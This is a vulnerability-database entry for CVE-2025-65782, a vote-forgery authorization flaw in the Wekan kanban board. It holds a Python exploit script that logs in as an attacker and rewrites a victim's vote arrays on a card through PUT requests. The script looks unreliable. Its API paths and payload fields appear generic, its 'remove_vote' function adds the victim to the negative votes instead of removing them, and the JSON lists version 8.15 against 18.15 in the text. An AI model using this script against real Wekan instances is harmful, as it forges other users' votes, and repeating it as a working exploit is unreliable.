CVE-2025-65782

Description

An issue was discovered in Wekan The Open Source kanban board system up to version 18.15, fixed in 18.16. Authorization flaw in card update handling allows board members (and potentially other authenticated users) to add/remove arbitrary user IDs in vote.positive / vote.negative arrays, enabling vote forgery and unauthorized voting.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:wekan_project:wekan:*:*:*:*:*:*:*:* - VULNERABLE

Wekan < 18.16

Wekan <= 18.15

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2025-65782 PoC - Wekan Vote Forgery
# Target: Wekan instance up to version 18.15

TARGET_URL = "http://target-wekan-server.com"
USERNAME = "attacker"
PASSWORD = "password"
BOARD_ID = "board_id"
CARD_ID = "vulnerable_card_id"
TARGET_USER_ID = "victim_user_id"

def login():
    """Authenticate and get session token"""
    session = requests.Session()
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    response = session.post(f"{TARGET_URL}/api/v1/login", json=login_data)
    return session, response.json().get("token")

def forge_vote(session, token):
    """Forge vote by adding arbitrary user to vote.positive array"""
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    
    # Malicious payload: add TARGET_USER_ID to vote.positive without authorization
    payload = {
        "boardId": BOARD_ID,
        "cardId": CARD_ID,
        "set": "votes",
        "update": {
            "vote": {
                "positive": [TARGET_USER_ID],
                "negative": []
            }
        }
    }
    
    response = session.put(
        f"{TARGET_URL}/api/v1/boards/{BOARD_ID}/cards/{CARD_ID}",
        headers=headers,
        json=payload
    )
    return response.status_code == 200

def remove_vote(session, token):
    """Remove victim's vote by modifying vote arrays"""
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    
    payload = {
        "boardId": BOARD_ID,
        "cardId": CARD_ID,
        "set": "votes",
        "update": {
            "vote": {
                "positive": [],
                "negative": [TARGET_USER_ID]
            }
        }
    }
    
    response = session.put(
        f"{TARGET_URL}/api/v1/boards/{BOARD_ID}/cards/{CARD_ID}",
        headers=headers,
        json=payload
    )
    return response.status_code == 200

if __name__ == "__main__":
    session, token = login()
    if forge_vote(session, token):
        print("[+] Vote forgery successful - user added to vote.positive")
    else:
        print("[-] Vote forgery failed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65782
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65782
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65782/
[4] VulDB https://vuldb.com/cve/CVE-2025-65782
[5] https://github.com/wekan/wekan
[6] https://github.com/wekan/wekan/blob/main/CHANGELOG.md#v816-2025-11-02-wekan--release
[7] https://github.com/wekan/wekan/commit/0a1a075f3153e71d9a858576f1c68d2925230d9c
[8] https://wekan.fi/hall-of-fame/spacebleed/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65782", "sourceIdentifier": "[email protected]", "published": "2025-12-15T14:15:57.680", "lastModified": "2025-12-23T18:08:12.667", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Wekan The Open Source kanban board system up to version 18.15, fixed in 18.16. Authorization flaw in card update handling allows board members (and potentially other authenticated users) to add/remove arbitrary user IDs in vote.positive / vote.negative arrays, enabling vote forgery and unauthorized voting."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wekan_project:wekan:*:*:*:*:*:*:*:*", "versionEndIncluding": "8.15", "matchCriteriaId": "7D13533B-E5D9-47D8-97E7-6FEC5357E4E6"}]}]}], "references": [{"url": "https://github.com/wekan/wekan", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/wekan/wekan/blob/main/CHANGELOG.md#v816-2025-11-02-wekan--release", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/wekan/wekan/commit/0a1a075f3153e71d9a858576f1c68d2925230d9c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://wekan.fi/hall-of-fame/spacebleed/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}